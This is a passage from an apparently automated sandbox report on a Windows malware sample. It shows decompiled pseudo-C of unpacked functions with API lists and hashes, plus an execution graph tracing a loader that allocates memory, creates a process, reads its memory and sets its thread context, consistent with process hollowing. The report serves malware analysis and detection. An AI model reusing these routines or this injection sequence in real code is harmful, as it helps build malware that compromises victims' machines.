				intOrPtr _t89;
				intOrPtr _t91;
				char* _t92;
				void* _t93;

				_t46 = _a4;
				_v8 = __edx;
				E00401503(_t46, 0x808);
				E00405F15(_t46, E00401A52(0x4120d0, 0x680f9b3));
				L00401B09(_t25);
				_t28 = E00401A52(0x4122a0, 0x680f9b3);
				_t3 = _t46 + 0x400; // 0x4065cd
				 *0x4143a4(_t3, 0x200, _t28, __ecx, _t46, _t78, _t86, _t45, __ecx);
				L00401B09(_t28);
				_t80 = _v8;
				_t56 = 3;
				_t89 = E004014F2(( *((intOrPtr*)(_v8 + 4)) + 2) / _t56 << 2);
				_v8 = _t89;
				if(_t89 != 0) {
					_a4 = E0040156A( *_t80,  *((intOrPtr*)(_t80 + 4)), _t89);
					_t84 = (GetTickCount() & 0x0000000f) + 4;
					_t14 = E0040162B(_t89, _a4) + 1; // 0x1
					_t91 = E004014F2(_t14 + _t84);
					 *((intOrPtr*)(_t46 + 0x800)) = _t91;
					if(_t91 == 0) {
						_t85 = _v8;
					} else {
						E00401E27(_t91, _t84);
						_t92 = _t91 + _t84;
						_t85 = _v8;
						 *_t92 = 0x3d;
						_t93 = _t92 + 1;
						_t44 = E00401680(_v8, _a4, _t93);
						_t18 = _t46 + 0x800; // 0xc885c70e
						 *((intOrPtr*)(_t46 + 0x804)) = _t93 + _t44 -  *_t18;
					}
					E00401532(_t85);
				}
				return 0 |  *((intOrPtr*)(_t46 + 0x800)) != 0x00000000;
			}
















                  0x00405fa9
                  0x00405fae
                  0x00405fba
                  0x00405fd4
                  0x00405fdb
                  0x00405fea
                  0x00405ff3
                  0x00406000
                  0x0040600b
                  0x00406010
                  0x00406017
                  0x0040602a
                  0x0040602c
                  0x00406031
                  0x0040603f
                  0x00406052
                  0x0040605a
                  0x00406064
                  0x00406066
                  0x0040606e
                  0x0040609e
                  0x00406070
                  0x00406074
                  0x0040607c
                  0x0040607e
                  0x00406083
                  0x00406086
                  0x00406088
                  0x0040608f
                  0x00406096
                  0x00406096
                  0x004060a3
                  0x004060a3
                  0x004060b9

                  APIs
                    • Part of subcall function 00405F15: lstrlenW.KERNEL32(00000000,?,00000000,004061CD,?,004061CD,?), ref: 00405F26
                    • Part of subcall function 00405F15: GetTickCount.KERNEL32(?,004061CD,?), ref: 00405F2F
                  • _snwprintf.NTDLL ref: 00406000
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • GetTickCount.KERNEL32 ref: 00406042
                    • Part of subcall function 00401E27: GetTickCount.KERNEL32(-00000004,00000000,004061CD), ref: 00401E39
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$Heap$AllocateProcess_snwprintflstrlen
                  • String ID: g8Cw
                  • API String ID: 459781281-3103284439
                  • Opcode ID: 76b03827719990e30b0c101892e01b597c257d1c543933898f8cee2b7d7ceefb
                  • Instruction ID: 00cdad927da0c0ef8d73a3e5ef527bbb7d9062bc05b5f9e08202af6a880e88a8
                  • Opcode Fuzzy Hash: 76b03827719990e30b0c101892e01b597c257d1c543933898f8cee2b7d7ceefb
                  • Instruction Fuzzy Hash: BC31B531B000109BCB14EF658841A9E7796AFC4754F29817EED0AAF3D6DE789D0187D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040FC67, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46synchronizationUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040FC67() {
				void* _t9;
				int _t10;
				void* _t15;
				intOrPtr* _t21;
				intOrPtr* _t22;

				_t22 =  *0x4164e4;
				_t21 = 0x4164e4;
				if(_t22 == 0) {
					return _t9;
				}
				do {
					_t15 = 0;
					if( *((intOrPtr*)(_t22 + 8)) == 1 ||  *((intOrPtr*)(_t22 + 8)) == 2) {
						_t15 = 1;
					}
					if( *((intOrPtr*)(_t22 + 8)) == 3) {
						_t10 = WaitForSingleObject( *(_t22 + 0x14), 0);
						if(_t10 == 0) {
							 *((intOrPtr*)(_t22 + 0x10))( *((intOrPtr*)(_t22 + 0xc)), _t10, _t10);
							E0040192A( *((intOrPtr*)(_t22 + 0xc)));
							_t10 = CloseHandle( *(_t22 + 0x14));
							_t15 = 1;
						}
					}
					if(_t15 == 0) {
						_t21 = _t22;
					} else {
						 *_t21 =  *_t22;
						_t10 = E00401532(_t22);
					}
					_t22 =  *_t21;
				} while (_t22 != 0);
				return _t10;
			}








                  0x0040fc68
                  0x0040fc6f
                  0x0040fc76
                  0x0040fcd7
                  0x0040fcd7
                  0x0040fc79
                  0x0040fc79
                  0x0040fc7f
                  0x0040fc89
                  0x0040fc89
                  0x0040fc8e
                  0x0040fc95
                  0x0040fc9d
                  0x0040fca4
                  0x0040fcaa
                  0x0040fcb2
                  0x0040fcba
                  0x0040fcba
                  0x0040fc9d
                  0x0040fcbd
                  0x0040fccc
                  0x0040fcbf
                  0x0040fcc3
                  0x0040fcc5
                  0x0040fcc5
                  0x0040fcce
                  0x0040fcd0
                  0x00000000

                  APIs
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040FC95
                  • CloseHandle.KERNEL32(?), ref: 0040FCB2
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleObjectSingleWait
                  • String ID: dA
                  • API String ID: 528846559-3833285433
                  • Opcode ID: 3fd25aa55a6274f4f7e9cc92725da2f21c8c3f2147d4135f88846fc5401ef8fd
                  • Instruction ID: 9783dac627fe2aad0d055cd04b4053eec809d95b972e8a9730baec20d1199667
                  • Opcode Fuzzy Hash: 3fd25aa55a6274f4f7e9cc92725da2f21c8c3f2147d4135f88846fc5401ef8fd
                  • Instruction Fuzzy Hash: E601B1322047118FE7304F65D999923B3A8BF44715711893BEC4363BA0C334AC48C648
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C5A7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0040C5A7(void* __eflags) {
				short _v132;
				void* _t5;
				void* _t11;

				_t5 = E00401A52(0x4127e0, 0x72fc3a35);
				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
				L00401B09(_t5);
				_t11 = CreateEventW(0, 0, 0,  &_v132);
				 *0x414e6c = _t11;
				return 0 | _t11 != 0x00000000;
			}






                  0x0040c5bb
                  0x0040c5cf
                  0x0040c5da
                  0x0040c5e8
                  0x0040c5f0
                  0x0040c600

                  APIs
                  • _snwprintf.NTDLL ref: 0040C5CF
                  • CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 0040C5E8
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateEvent_snwprintf
                  • String ID: g8Cw
                  • API String ID: 3138640819-3103284439
                  • Opcode ID: bf91c9978e232df667675dfab0b91fafffa405702bdcbacc6dac383674977833
                  • Instruction ID: 966a77967990d1c2b3e105985163cbd3e7ea594235671e381eb49e2a5e3bd5e9
                  • Opcode Fuzzy Hash: bf91c9978e232df667675dfab0b91fafffa405702bdcbacc6dac383674977833
                  • Instruction Fuzzy Hash: BDF0A7717001146BD701ABA96C05AFB36ACEB44304F00803EF905D7190EE34D81087DD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F292, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0040F292() {
				void* _t3;
				void* _t7;
				void* _t10;
				void* _t15;
				void* _t18;
				void* _t19;

				if( *0x415f4c == 0) {
					E0040F227();
				} else {
					E0040F214();
				}
				E00401503(0x416840, 0x104);
				_t3 = E00401A52(0x412bb0, 0x4bf67e71);
				_t19 = _t3;
				 *0x4143a4(0x416840, 0x104, _t19, 0x416a48, 0x416530, _t15, _t18, _t7);
				_t10 = _t19;
				return HeapFree(GetProcessHeap(), 0, _t10);
			}









                  0x0040f299
                  0x0040f2a2
                  0x0040f29b
                  0x0040f29b
                  0x0040f29b
                  0x0040f2b8
                  0x0040f2c7
                  0x0040f2d6
                  0x0040f2db
                  0x0040f2e4
                  0x00401542

                  APIs
                  • _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F214: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,00416A48,0040F2A0,0040F94C,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F220
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf
                  • String ID: @hA$g8Cw
                  • API String ID: 3078599568-2636106944
                  • Opcode ID: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction ID: e972b69ea5731f996dd58b1a7c700a453acaa9277561cdf85d49239cb67cc4b6
                  • Opcode Fuzzy Hash: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction Fuzzy Hash: D4E022203000106BC2207286AC457FB114ACBC2399B2180BFF90AB62D2CA7D8C06C37E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F227, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E0040F227() {
				void* _t3;
				void* _t8;
				void* _t10;
				void* _t13;
				void* _t14;

				 *0x414c14(0, 0x1c, 0, 0, 0x416a48, _t10, _t13);
				_t3 = E00401A52(0x412df0, 0x4bf67e71);
				_t14 = _t3;
				 *0x4143a4(0x416a48, 0x104, _t14, 0x416a48, 0x416530);
				_t8 = _t14;
				return HeapFree(GetProcessHeap(), 0, _t8);
			}








                  0x0040f236
                  0x0040f246
                  0x0040f251
                  0x0040f25a
                  0x0040f263
                  0x00401542

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf
                  • String ID: HjA$g8Cw
                  • API String ID: 3988819677-3647325788
                  • Opcode ID: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction ID: 86e21f4e142f409bbdd5896e6b5cbe9030aa6b7bc5bdc0fcc4a87da7cf4bd144
                  • Opcode Fuzzy Hash: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction Fuzzy Hash: 9FE0CD717401107BD31062656D09EF7695DDBD1FA1712403EBE0AE71D1E5748C41C27D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00402561, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402561(signed int _a8, signed int _a12) {

				return RtlAllocateHeap(GetProcessHeap(), 8, _a8 * _a12);
			}



                  0x0040257c

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,?), ref: 0040256E
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402575
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: db4b5c6fe51ac2aff8aaaddd553206b00f81b8980156135b8fd8a4c4febe71d0
                  • Instruction ID: 7b0aceb4be34622b36046658aba6f4cfe0c30366996fb5ad577a8c43a0e85ff0
                  • Opcode Fuzzy Hash: db4b5c6fe51ac2aff8aaaddd553206b00f81b8980156135b8fd8a4c4febe71d0
                  • Instruction Fuzzy Hash: 98C08C32100308ABCB009FD8ED49DAA77ACFB48A02F00C010BA18CA090DA30F6008BA4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004014F2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6memoryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004014F2(long __ecx) {

				return RtlAllocateHeap(GetProcessHeap(), 8, __ecx);
			}



                  0x00401502

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction ID: f421614fde833f2996113b85f7123fd9be9ad5eab0a4f509e971bf896a641baa
                  • Opcode Fuzzy Hash: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction Fuzzy Hash: 72A012B16001009BDE001FA49D0DA553518B740703F00C054710590090ED6422008764
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004014F2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6memoryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004014F2(long __ecx) {

				return RtlAllocateHeap(GetProcessHeap(), 8, __ecx);
			}



                  0x00401502

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction ID: f421614fde833f2996113b85f7123fd9be9ad5eab0a4f509e971bf896a641baa
                  • Opcode Fuzzy Hash: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction Fuzzy Hash: 72A012B16001009BDE001FA49D0DA553518B740703F00C054710590090ED6422008764
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040499D, Relevance: 5.1, APIs: 4, Instructions: 98COMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0040499D(intOrPtr* __ecx, signed int _a8) {
				intOrPtr _t68;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				int* _t85;
				void* _t86;

				_t83 = _a8;
				_t85 = __ecx;
				asm("cdq");
				_t80 = 3;
				 *(__ecx + 8) = _t83;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = ((_t83 & 0x00000fff) + 2) / _t80 + 1;
				 *(__ecx + 0x14) = _t83 >> 0x0000000e & 0x00000001;
				asm("cdq");
				 *((intOrPtr*)(__ecx + 0x10)) = ((_t83 >> 0x00000002 & 0x000003ff) + 2) / _t80 + 1;
				_t84 = _t83 & 0x00008000;
				if(_t84 == 0) {
					_t15 = _t85 + 0x29272; // 0x29272
					memset(_t15, 0, 0x10000);
					_t86 = _t86 + 0xc;
				}
				 *((intOrPtr*)(_t85 + 0x44)) = 0;
				_t17 = _t85 + 0x9273; // 0x9273
				 *((intOrPtr*)(_t85 + 0x28)) = _t17;
				_t19 = _t85 + 0x9272; // 0x9272
				 *((intOrPtr*)(_t85 + 0x2c)) = _t19;
				_t21 = _t85 + 0x39272; // 0x39272
				_t68 = _t21;
				 *((intOrPtr*)(_t85 + 0x40)) = 0;
				 *((intOrPtr*)(_t85 + 0x3c)) = 0;
				 *((intOrPtr*)(_t85 + 0x24)) = 0;
				 *((intOrPtr*)(_t85 + 0x20)) = 0;
				 *((intOrPtr*)(_t85 + 0x1c)) = 0;
				 *((intOrPtr*)(_t85 + 0x68)) = 0;
				 *((intOrPtr*)(_t85 + 0x48)) = 0;
				 *((intOrPtr*)(_t85 + 0x64)) = 0;
				 *((intOrPtr*)(_t85 + 0x60)) = 0;
				 *((intOrPtr*)(_t85 + 0x5c)) = 0;
				 *((intOrPtr*)(_t85 + 0x58)) = 0;
				 *((intOrPtr*)(_t85 + 0x38)) = 8;
				 *((intOrPtr*)(_t85 + 0x30)) = _t68;
				 *((intOrPtr*)(_t85 + 0x34)) = _t68;
				 *((intOrPtr*)(_t85 + 0x6c)) = 0;
				 *((intOrPtr*)(_t85 + 0x54)) = 0;
				 *((intOrPtr*)(_t85 + 0x50)) = 0;
				 *((intOrPtr*)(_t85 + 0x4c)) = 0;
				 *((intOrPtr*)(_t85 + 0x18)) = 1;
				 *((intOrPtr*)(_t85 + 0x70)) = 0;
				 *((intOrPtr*)(_t85 + 0x74)) = 0;
				 *((intOrPtr*)(_t85 + 0x78)) = 0;
				 *((intOrPtr*)(_t85 + 0x7c)) = 0;
				 *((intOrPtr*)(_t85 + 0x80)) = 0;
				 *((intOrPtr*)(_t85 + 0x84)) = 0;
				 *((intOrPtr*)(_t85 + 0x88)) = 0;
				 *((intOrPtr*)(_t85 + 0x8c)) = 0;
				if(_t84 == 0) {
					_t49 = _t85 + 0x90; // 0x90
					memset(_t49, 0, 0x8101);
					_t86 = _t86 + 0xc;
				}
				_t50 = _t85 + 0x8192; // 0x8192
				memset(_t50, 0, 0x240);
				_t51 = _t85 + 0x83d2; // 0x83d2
				memset(_t51, 0, 0x40);
				return 0;
			}









                  0x004049a3
                  0x004049a6
                  0x004049b4
                  0x004049b7
                  0x004049ba
                  0x004049be
                  0x004049c0
                  0x004049c3
                  0x004049ce
                  0x004049de
                  0x004049e2
                  0x004049e5
                  0x004049eb
                  0x004049f2
                  0x004049fa
                  0x00404a00
                  0x00404a00
                  0x00404a03
                  0x00404a06
                  0x00404a0c
                  0x00404a0f
                  0x00404a15
                  0x00404a18
                  0x00404a18
                  0x00404a1e
                  0x00404a21
                  0x00404a24
                  0x00404a27
                  0x00404a2a
                  0x00404a2d
                  0x00404a30
                  0x00404a33
                  0x00404a36
                  0x00404a39
                  0x00404a3c
                  0x00404a3f
                  0x00404a46
                  0x00404a49
                  0x00404a4c
                  0x00404a4f
                  0x00404a52
                  0x00404a55
                  0x00404a58
                  0x00404a5f
                  0x00404a62
                  0x00404a65
                  0x00404a68
                  0x00404a6b
                  0x00404a71
                  0x00404a77
                  0x00404a7d
                  0x00404a85
                  0x00404a8c
                  0x00404a94
                  0x00404a9a
                  0x00404a9a
                  0x00404aa2
                  0x00404aaa
                  0x00404ab2
                  0x00404aba
                  0x00404ac9

                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: 9fc025132572919f3734a29ac81ef1a2200ba00e6701f7d6fd5a461a0fe62915
                  • Instruction ID: 70126d602587bd303643ef6f1a7dad0836f0adfd5b30951eb2e943be6850c986
                  • Opcode Fuzzy Hash: 9fc025132572919f3734a29ac81ef1a2200ba00e6701f7d6fd5a461a0fe62915
                  • Instruction Fuzzy Hash: D141B2B2900B049FD320CF6AD885683FBE8FB48714B84893ED6DEC2A50D775B5448F54
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Analysis Process: sortedwatched.exe PID: 3732 Parent PID: 416 sortedwatched.exeUNIQUE

                  Execution Graph

                  Execution Coverage:12.5%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:10.2%
                  Total number of Nodes:186
                  Total number of Limit Nodes:3

                  Graph

                  execution_graph 3398 3e123f 3399 3e1271 3398->3399 3402 3e093f 3399->3402 3401 3e127d 3405 3e213f GetPEB 3402->3405 3404 3e0d04 3404->3401 3406 3e2169 3405->3406 3406->3404 3450 3e1a8f 3451 3e1ab0 3450->3451 3452 3e093f GetPEB 3451->3452 3453 3e1abc 3452->3453 3454 3e1b9a 3453->3454 3455 3e1ada 3453->3455 3464 3e1fef 3454->3464 3459 3e12bf 3455->3459 3458 3e1b81 3460 3e093f GetPEB 3459->3460 3463 3e135e 3460->3463 3462 3e139f 3462->3458 3463->3462 3467 3e219f GetPEB 3463->3467 3465 3e12bf 2 API calls 3464->3465 3466 3e1ff9 3465->3466 3466->3458 3468 3e21c9 3467->3468 3468->3463 3519 3e15df 3520 3e1600 3519->3520 3521 3e093f GetPEB 3520->3521 3522 3e160c 3521->3522 3523 3e162a 3522->3523 3524 3e16c0 3522->3524 3525 3e12bf 2 API calls 3523->3525 3528 3e1f6f 3524->3528 3527 3e16a7 3525->3527 3529 3e12bf 2 API calls 3528->3529 3530 3e1f79 3529->3530 3530->3527 3543 3e1bcf 3544 3e1bfc 3543->3544 3551 3e1bf2 3543->3551 3545 3e093f GetPEB 3544->3545 3544->3551 3546 3e1c3e 3545->3546 3547 3e1d5c 3546->3547 3548 3e1c5c 3546->3548 3552 3e200f 3547->3552 3549 3e12bf 2 API calls 3548->3549 3549->3551 3553 3e12bf 2 API calls 3552->3553 3554 3e2019 3553->3554 3554->3551 3436 5a1dc0 3437 5a1ded 3436->3437 3438 5a1000 GetPEB 3437->3438 3439 5a1df9 3438->3439 3440 5a2ad0 IsWow64Process 3439->3440 3441 5a1e0f 3440->3441 3442 5a1ecd 3441->3442 3443 5a1e17 3441->3443 3447 5a2610 3442->3447 3444 5a1980 9 API calls 3443->3444 3446 5a1ead 3444->3446 3448 5a1980 9 API calls 3447->3448 3449 5a261a 3448->3449 3449->3446 3273 3e0000 3275 3e0005 3273->3275 3278 3e002d 3275->3278 3298 3e0467 GetPEB 3278->3298 3281 3e0467 GetPEB 3282 3e0053 3281->3282 3283 3e0467 GetPEB 3282->3283 3284 3e0061 3283->3284 3285 3e0467 GetPEB 3284->3285 3286 3e006d 3285->3286 3287 3e0467 GetPEB 3286->3287 3288 3e007b 3287->3288 3289 3e0467 GetPEB 3288->3289 3292 3e0089 3289->3292 3290 3e00e6 GetNativeSystemInfo 3291 3e0109 VirtualAlloc 3290->3291 3296 3e0029 3290->3296 3293 3e0135 3291->3293 3292->3290 3292->3296 3293->3293 3294 3e03c3 3293->3294 3295 3e0384 VirtualProtect 3293->3295 3300 5a1900 3294->3300 3295->3293 3295->3296 3299 3e0045 3298->3299 3299->3281 3301 5a1932 3300->3301 3306 5a1000 3301->3306 3303 5a193e 3309 5a1470 3303->3309 3305 5a196c ExitProcess 3305->3296 3325 5a2800 GetPEB 3306->3325 3308 5a13c5 3308->3303 3310 5a1486 3309->3310 3311 5a153d 3310->3311 3312 5a1569 CreateProcessW 3310->3312 3313 5a159e ReadProcessMemory 3310->3313 3315 5a1578 3310->3315 3317 5a2290 10 API calls 3310->3317 3319 5a1820 SetThreadContext 3310->3319 3321 5a1858 CloseHandle 3310->3321 3322 5a1865 CloseHandle 3310->3322 3323 5a1872 CloseHandle 3310->3323 3324 5a20a0 10 API calls 3310->3324 3327 5a2150 3310->3327 3338 5a1ca0 3310->3338 3349 5a1fd0 3310->3349 3312->3310 3312->3315 3313->3310 3313->3315 3315->3311 3360 5a20a0 3315->3360 3317->3310 3319->3310 3319->3315 3321->3310 3322->3310 3323->3310 3324->3310 3326 5a282a 3325->3326 3326->3308 3328 5a2171 3327->3328 3329 5a1000 GetPEB 3328->3329 3330 5a217d 3329->3330 3371 5a2ad0 3330->3371 3332 5a2193 3333 5a225b 3332->3333 3334 5a219b 3332->3334 3335 5a26b0 9 API calls 3333->3335 3336 5a1980 9 API calls 3334->3336 3337 5a2242 3335->3337 3336->3337 3337->3310 3339 5a1cc1 3338->3339 3340 5a1000 GetPEB 3339->3340 3341 5a1ccd 3340->3341 3342 5a2ad0 IsWow64Process 3341->3342 3343 5a1ce3 3342->3343 3344 5a1ceb 3343->3344 3345 5a1d81 3343->3345 3377 5a1980 3344->3377 3374 5a2630 3345->3374 3348 5a1d68 3348->3310 3350 5a1ff1 3349->3350 3351 5a1000 GetPEB 3350->3351 3352 5a1ffd 3351->3352 3353 5a2ad0 IsWow64Process 3352->3353 3354 5a2013 3353->3354 3355 5a2063 3354->3355 3356 5a2017 3354->3356 3392 5a2670 3355->3392 3358 5a1980 9 API calls 3356->3358 3359 5a2058 3358->3359 3359->3310 3361 5a20b8 3360->3361 3362 5a1000 GetPEB 3361->3362 3363 5a20c4 3362->3363 3364 5a2ad0 IsWow64Process 3363->3364 3365 5a20da 3364->3365 3366 5a212a 3365->3366 3367 5a20de 3365->3367 3395 5a2690 3366->3395 3368 5a1980 9 API calls 3367->3368 3370 5a211f 3368->3370 3370->3311 3372 5a2adc IsWow64Process 3371->3372 3373 5a2ae9 3371->3373 3372->3373 3375 5a1980 9 API calls 3374->3375 3376 5a263a 3375->3376 3376->3348 3378 5a1000 GetPEB 3377->3378 3387 5a1a1f 3378->3387 3380 5a1a50 CreateFileW 3383 5a1a60 3380->3383 3380->3387 3381 5a1a7f VirtualAlloc 3382 5a1aa0 ReadFile 3381->3382 3381->3383 3382->3383 3386 5a1ac1 VirtualAlloc 3382->3386 3384 5a1c7e VirtualFree 3383->3384 3385 5a1c8f 3383->3385 3384->3385 3385->3348 3386->3383 3386->3387 3387->3381 3387->3383 3388 5a1b89 CloseHandle 3387->3388 3389 5a1b99 VirtualFree 3387->3389 3390 5a2860 GetPEB 3387->3390 3388->3387 3389->3387 3391 5a288a 3390->3391 3391->3380 3393 5a1980 9 API calls 3392->3393 3394 5a267a 3393->3394 3394->3359 3396 5a1980 9 API calls 3395->3396 3397 5a269a 3396->3397 3397->3370 3407 3f09b1 3414 3ee40d 3407->3414 3409 3f09c2 3417 3ef4c3 3409->3417 3411 3f09c7 3412 3f0a5f 3411->3412 3420 3ee18d 3411->3420 3424 3e2c0c GetPEB 3414->3424 3416 3ef4af 3416->3409 3418 3e2c0c GetPEB 3417->3418 3419 3f099d 3418->3419 3419->3411 3422 3ee19b 3420->3422 3421 3ee1e4 3421->3411 3422->3421 3426 3ee0ce 3422->3426 3425 3e2c21 3424->3425 3425->3416 3427 3ee0d9 3426->3427 3430 3ee0df 3426->3430 3427->3430 3431 3edfc1 3427->3431 3429 3ee106 3429->3422 3430->3422 3432 3edfce 3431->3432 3435 3e3743 GetPEB 3432->3435 3434 3ee000 3434->3429 3435->3434

                  Executed Functions

                  Function 005A26D0, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction ID: 8b4e015e42c500266558983ad234722086081f856e728c507d880a578f1cc1b2
                  • Opcode Fuzzy Hash: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction Fuzzy Hash: FD90023D71B47606024577E4055B98EAC443BD2740B448005E003014424E108438DE37
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 005A2670, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 409 5a2670-5a267f call 5a1980 call 5a2600
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
